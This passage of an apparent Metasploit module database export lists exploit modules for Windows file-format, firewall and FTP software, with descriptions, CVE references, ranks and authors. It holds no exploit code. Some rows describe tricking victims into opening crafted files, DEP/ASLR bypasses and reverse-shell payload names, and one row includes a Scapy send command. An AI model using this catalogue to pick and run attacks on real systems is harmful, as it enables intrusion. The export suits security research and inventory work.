(BSD)","f","2010-03-17 00:00:00",0,,"aggressive","t","BID-38815, EDB-11789, OSVDB-63067","MC , dookie, jduck , n00b" 685,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/videolan_tivo.rb","exploit","windows/fileformat/videolan_tivo","exploit/windows/fileformat/videolan_tivo","VideoLAN VLC TiVo Buffer Overflow",400,"This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",0,,"aggressive","t","BID-31813, CVE-2008-4654, OSVDB-49181","MC " 686,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/videospirit_visprj.rb","exploit","windows/fileformat/videospirit_visprj","exploit/windows/fileformat/videospirit_visprj","VeryTools Video Spirit Pro <= 1.70",400,"This module exploits a stack buffer overflow in Video Spirit <= 1.70. When opening a malicious project file (.visprj), a stack buffer overflow occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"aggressive","t","CVE-2011-0499, CVE-2011-0500, OSVDB-70619, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001","Acidgen, corelanc0d3r " 687,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/visio_dxf_bof.rb","exploit","windows/fileformat/visio_dxf_bof","exploit/windows/fileformat/visio_dxf_bof","Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",400,"This module exploits a stack based overflow vulnerability in the handling of the DXF files by Microsoft Visio 2002. Revisions prior to the release of the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application is used to import a specially crafted DXF file, while parsing the HEADER section of the DXF file. To trigger the vulnerability an attacker must convince someone to insert a specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'","Metasploit Framework License (BSD)","f","2010-05-04 00:00:00",,,"aggressive","t","BID-39836, CVE-2010-1681, OSVDB-64446, URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow, URL-http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/","CORE Security, Shahin Ramezany , juan vazquez " 688,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/visiwave_vwr_type.rb","exploit","windows/fileformat/visiwave_vwr_type","exploit/windows/fileformat/visiwave_vwr_type","VisiWave VWR File Parsing Vulnerability",500,"This module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.","Metasploit Framework License (BSD)","f","2011-05-20 00:00:00",0,,"aggressive","t","CVE-2011-2386, OSVDB-72464, URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20, URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html","TecR0c , mr_me " 689,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb","exploit","windows/fileformat/vlc_modplug_s3m","exploit/windows/fileformat/vlc_modplug_s3m","VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",200,"This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.","Metasploit Framework License (BSD)","f","2011-04-07 00:00:00",0,,"aggressive","t","CVE-2011-1574, OSVDB-72143, URL-http://hackipedia.org/File%20formats/Music/html/s3mformat.php, URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b, URL-http://seclists.org/fulldisclosure/2011/Apr/113, URL-https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt","jduck " 690,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_realtext.rb","exploit","windows/fileformat/vlc_realtext","exploit/windows/fileformat/vlc_realtext","VLC Media Player RealText Subtitle Overflow",400,"This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.","Metasploit Framework License (BSD)","f","2008-11-05 00:00:00",0,,"aggressive","t","BID-32125, CVE-2008-5036, OSVDB-49809, URL-http://www.trapkit.de/advisories/TKADV2008-011.txt, URL-http://www.videolan.org/security/sa0810.html","SkD, Tobias Klein, juan vazquez " 691,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_smb_uri.rb","exploit","windows/fileformat/vlc_smb_uri","exploit/windows/fileformat/vlc_smb_uri","VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This payload was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp was found not to work.","Metasploit Framework License (BSD)","f","2009-06-24 00:00:00",0,,"aggressive","t","BID-35500, CVE-2009-2484, EDB-9029, OSVDB-55509, URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f","jduck " 692,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_webm.rb","exploit","windows/fileformat/vlc_webm","exploit/windows/fileformat/vlc_webm","VideoLAN VLC MKV Memory Corruption",400,"This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it.","Metasploit Framework License (BSD)","f","2011-01-31 00:00:00",0,,"aggressive","t","BID-46060, CVE-2011-0531, OSVDB-70698, URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456, URL-http://www.videolan.org/security/sa1102.html","Dan Rosenberg" 693,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vuplayer_cue.rb","exploit","windows/fileformat/vuplayer_cue","exploit/windows/fileformat/vuplayer_cue","VUPlayer CUE Buffer Overflow",400,"This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, an buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",0,,"aggressive","t","BID-33960, OSVDB-64581","MC " 694,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vuplayer_m3u.rb","exploit","windows/fileformat/vuplayer_m3u","exploit/windows/fileformat/vuplayer_m3u","VUPlayer M3U Buffer Overflow",400,"This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted m3u file, an buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",0,,"aggressive","t","CVE-2006-6251, OSVDB-31710","MC " 695,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/winamp_maki_bof.rb","exploit","windows/fileformat/winamp_maki_bof","exploit/windows/fileformat/winamp_maki_bof","Winamp MAKI Buffer Overflow",300,"This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used with in a insecure way with user controlled data. To exploit the vulnerability the attacker must convince the attacker to install the generated mcvcore.maki file in the ""scripts"" directory of the default ""Bento"" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2009-05-20 00:00:00",0,,"aggressive","t","BID-35052, CVE-2009-1831, EDB-8767, EDB-8770, EDB-8772, EDB-8783, OSVDB-54902, URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html","Monica Sojeong Hong, juan vazquez " 696,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/wireshark_packet_dect.rb","exploit","windows/fileformat/wireshark_packet_dect","exploit/windows/fileformat/wireshark_packet_dect","Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)",400,"This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(""file""))","Metasploit Framework License (BSD)","f","2011-04-18 00:00:00",0,,"aggressive","t","CVE-2011-1591, EDB-17185, OSVDB-71848, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838","Paul Makowski, corelanc0d3r , sickness" 697,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/wm_downloader_m3u.rb","exploit","windows/fileformat/wm_downloader_m3u","exploit/windows/fileformat/wm_downloader_m3u","WM Downloader 3.1.2.2 Buffer Overflow",300,"This module exploits a buffer overflow in WM Downloader v3.1.2.2. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-07-28 00:00:00",0,,"aggressive","t","EDB-14497, OSVDB-66911","dookie, fdisk" 698,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb","exploit","windows/fileformat/xenorate_xpl_bof","exploit/windows/fileformat/xenorate_xpl_bof","Xenorate 2.50 (.xpl) universal Local Buffer Overflow (SEH)",500,"This module exploits a stack buffer overflow in Xenorate 2.50 by creating a specially crafted xpl file.","Metasploit Framework License (BSD)","f","2009-08-19 00:00:00",0,,"aggressive","t","EDB-10371, OSVDB-57162","germaya_x, hack4love , jduck , loneferret" 699,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb","exploit","windows/fileformat/xion_m3u_sehbof","exploit/windows/fileformat/xion_m3u_sehbof","Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Xion Audio Player prior to version 1.0.126. The vulnerability is triggered when opening a malformed M3U file that contains an overly long string. This results in overwriting a structured exception handler record.","Metasploit Framework License (BSD)","f","2010-11-23 00:00:00",0,,"aggressive","t","EDB-14517, EDB-14633, EDB-15598, OSVDB-66912","corelanc0d3r , digital1, hadji samir , jduck , m_101" 700,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb","exploit","windows/fileformat/xradio_xrl_sehbof","exploit/windows/fileformat/xradio_xrl_sehbof","xRadio 0.95b Buffer Overflow",300,"This module exploits a buffer overflow in xRadio 0.95b. Using the application to import a specially crafted xrl file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-02-08 00:00:00",0,,"aggressive","t","BID-46290, CVE-2008-2789, EDB-16141","b0telh0 " 701,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb","exploit","windows/fileformat/zinfaudioplayer221_pls","exploit/windows/fileformat/zinfaudioplayer221_pls","Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Zinf. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2004-09-24 00:00:00",0,,"aggressive","t","BID-11248, CVE-2004-0964, EDB-7888, OSVDB-10416","Trancek , patrick " 702,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/firewall/blackice_pam_icq.rb","exploit","windows/firewall/blackice_pam_icq","exploit/windows/firewall/blackice_pam_icq","ISS PAM.dll ICQ Parser Buffer Overflow",500,"This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.","Metasploit Framework License (BSD)","f","2004-03-18 00:00:00",0,,"aggressive","t","CVE-2004-0362, OSVDB-4355, URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html, URL-http://xforce.iss.net/xforce/alerts/id/166","spoonm " 703,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/firewall/kerio_auth.rb","exploit","windows/firewall/kerio_auth","exploit/windows/firewall/kerio_auth","Kerio Firewall 2.1.4 Authentication Packet Overflow",200,"This module exploits a stack buffer overflow in Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4).","Metasploit Framework License (BSD)","t","2003-04-28 00:00:00",0,,"aggressive","t","BID-7180, CVE-2003-0220, OSVDB-6294, URL-http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10","MC " 704,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/32bitftp_list_reply.rb","exploit","windows/ftp/32bitftp_list_reply","exploit/windows/ftp/32bitftp_list_reply","32bit FTP Client Stack Buffer Overflow ",400,"This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to download a file that has an overly long filename.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , fancy" 705,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb","exploit","windows/ftp/3cdaemon_ftp_user","exploit/windows/ftp/3cdaemon_ftp_user","3Com 3CDaemon 2.0 FTP Username Overflow",200,"This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This module uses the USER command to trigger the overflow.","Metasploit Framework License (BSD)","f","2005-01-04 00:00:00",,,"aggressive","t","BID-12155, CVE-2005-0277, OSVDB-12810, OSVDB-12811, URL-ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip","hdm , otr" 706,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/aasync_list_reply.rb","exploit","windows/ftp/aasync_list_reply","exploit/windows/ftp/aasync_list_reply","AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)",400,"This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 707,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ability_server_stor.rb","exploit","windows/ftp/ability_server_stor","exploit/windows/ftp/ability_server_stor","Ability Server 2.34 STOR Command Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Ability Server 2.34. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands, which leads to a stack based buffer overflow. This plugin uses the 'STOR' command. The vulnerability has been confirmed on version 2.34 and has also been reported in version 2.25 and 2.32. Other versions may also be affected.","Metasploit Framework License (BSD)","f","2004-10-22 00:00:00",,,"aggressive","t","CVE-2004-1626, EDB-588, OSVDB-11030","Dark Eagle, Peter Osterberg, muts" 708,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb","exploit","windows/ftp/absolute_ftp_list_bof","exploit/windows/ftp/absolute_ftp_list_bof","AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow",300,"This module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"passive","t","CVE-2011-5164, EDB-18102, OSVDB-77105","Node" 709,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/cesarftp_mkd.rb","exploit","windows/ftp/cesarftp_mkd","exploit/windows/ftp/cesarftp_mkd","Cesar FTP 0.99g MKD Command Buffer Overflow",200,"This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.","Metasploit Framework License (BSD)","t","2006-06-12 00:00:00",0,,"aggressive","t","BID-18586, CVE-2006-2961, OSVDB-26364, URL-http://secunia.com/advisories/20574/","MC " 710,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb","exploit","windows/ftp/comsnd_ftpd_fmtstr","exploit/windows/ftp/comsnd_ftpd_fmtstr","ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability",400,"This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially crafted format string specifier as a username. The crafted username is sent to to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled exception message. When using the meterpreter payload, the process will never die, allowing for continuous exploitation.","Metasploit Framework License (BSD)","f","2012-06-08 00:00:00",,,"aggressive","t","EDB-19024, OSVDB-82798","ChaoYi Huang , corelanc0d3r , mr_me , rick2600 " 711,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/dreamftp_format.rb","exploit","windows/ftp/dreamftp_format","exploit/windows/ftp/dreamftp_format","BolinTech Dream FTP Server 1.02 Format String",400,"This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.","Metasploit Framework License (BSD)","f","2004-03-03 00:00:00",0,,"aggressive","t","BID-9800, CVE-2004-2074, EDB-823, OSVDB-4986","patrick " 712,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyfilesharing_pass.rb","exploit","windows/ftp/easyfilesharing_pass","exploit/windows/ftp/easyfilesharing_pass","Easy File Sharing FTP Server 2.0 PASS Overflow",200,"This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-07-31 00:00:00",0,,"aggressive","t","BID-19243, CVE-2006-3952, OSVDB-27646","MC " 713,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb","exploit","windows/ftp/easyftp_cwd_fixret","exploit/windows/ftp/easyftp_cwd_fixret","EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed ""UplusFtp"". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.","Metasploit Framework License (BSD)","f","2010-02-16 00:00:00",0,,"aggressive","t","BID-38262, OSVDB-62134, URL-http://code.google.com/p/easyftpsvr/, URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/, URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit, URL-http://seclists.org/bugtraq/2010/Feb/202, URL-https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip","Paul Makowski , jduck " 714,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_list_fixret.rb","exploit","windows/ftp/easyftp_list_fixret","exploit/windows/ftp/easyftp_list_fixret","EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. credit goes to Karn Ganeshan. NOTE: Although, this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.","Metasploit Framework License (BSD)","f","2010-07-05 00:00:00",0,,"aggressive","t","EDB-14400, EDB-14451, OSVDB-62134","Karn Ganeshan , MFR, jduck " 715,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb","exploit","windows/ftp/easyftp_mkd_fixret","exploit/windows/ftp/easyftp_mkd_fixret","EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed ""UplusFtp"". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.","Metasploit Framework License (BSD)","f","2010-04-04 00:00:00",0,,"aggressive","t","EDB-12044, EDB-14399, OSVDB-62134","jduck , x90c " 716,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/filecopa_list_overflow.rb","exploit","windows/ftp/filecopa_list_overflow","exploit/windows/ftp/filecopa_list_overflow","FileCopa FTP Server pre 18 Jul Version",200,"This module exploits the buffer overflow found in the LIST command in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch","Metasploit Framework License (BSD)","t","2006-07-19 00:00:00",0,,"aggressive","t","BID-19065, CVE-2006-3726, OSVDB-27389","Jacopo Cervini" 717,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/filewrangler_list_reply.rb","exploit","windows/ftp/filewrangler_list_reply","exploit/windows/ftp/filewrangler_list_reply","FileWrangler 5.30 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the FileWrangler client that is triggered when the client connects to a FTP server and lists the directory contents, containing an overly long directory name.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 718,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freefloatftp_user.rb","exploit","windows/ftp/freefloatftp_user","exploit/windows/ftp/freefloatftp_user","Free Float FTP Server USER Command Buffer Overflow",300,"Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"aggressive","t","EDB-23243, OSVDB-69621","D35m0nd142, Doug Prostko " 719,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freefloatftp_wbem.rb","exploit","windows/ftp/freefloatftp_wbem","exploit/windows/ftp/freefloatftp_wbem","FreeFloat FTP Server Arbitrary File Upload",600,"This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.","Metasploit Framework License (BSD)","t","2012-12-07 00:00:00",0,,"passive","t","OSVDB-88302, OSVDB-88303, URL-http://metasploit.com","juan vazquez , sinn3r " 720,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/freeftpd_user.rb","exploit","windows/ftp/freeftpd_user","exploit/windows/ftp/freeftpd_user","freeFTPd 1.0 Username Overflow",200,"This module exploits a stack buffer overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).","Metasploit Framework License (BSD)","f","2005-11-16 00:00:00",,,"aggressive","t","BID-15457, CVE-2005-3683, OSVDB-20909, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html","MC " 721,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb","exploit","windows/ftp/ftpgetter_pwd_reply","exploit/windows/ftp/ftpgetter_pwd_reply","FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)",400,"This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client. When processing the response on a PWD command, a stack based buffer overflow occurs. This leads to arbitrary code execution when a structured exception handler gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68638, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , ekse" 722,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftppad_list_reply.rb","exploit","windows/ftp/ftppad_list_reply","exploit/windows/ftp/ftppad_list_reply","FTPPad 1.2.0 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is triggered when the client connects to a FTP server which sends an overly long directory and filename in response to a LIST command. This will cause an access violation, and will eventually overwrite the saved extended instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/ sniper was needed to make this one work.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r" 723,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb","exploit","windows/ftp/ftpshell51_pwd_reply","exploit/windows/ftp/ftpshell51_pwd_reply","FTPShell 5.1 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets triggered when the ftp clients tries to process an overly response to a PWD command. This will overwrite the saved EIP and structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68639, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 724,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ftpsynch_list_reply.rb","exploit","windows/ftp/ftpsynch_list_reply","exploit/windows/ftp/ftpsynch_list_reply","FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow",400,"This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro version 4.0.73.274 The overflow gets triggered by sending an overly long filename to the client in response to a LIST command. The LIST command gets issued when doing a preview or when you have just created a new sync profile and allow the tool to see the differences. This will overwrite a structured exception handler and trigger an access violation.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , myne-us" 725,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/gekkomgr_list_reply.rb","exploit","windows/ftp/gekkomgr_list_reply","exploit/windows/ftp/gekkomgr_list_reply","Gekko Manager FTP Client Stack Buffer Overflow",400,"This module exploits a buffer overflow in Gekko Manager ftp client, triggered when processing the response received after sending a LIST request. If this response contains a long filename, a buffer overflow occurs, overwriting a structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68641, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 726,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/globalscapeftp_input.rb","exploit","windows/ftp/globalscapeftp_input","exploit/windows/ftp/globalscapeftp_input","GlobalSCAPE Secure FTP Server Input Overflow",500,"This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.","BSD License","f","2005-05-01 00:00:00",0,,"aggressive","t","BID-13454, CVE-2005-1415, OSVDB-16049, URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html","Fairuzan Roslan , Mati Aharoni " 727,"2013-05-07 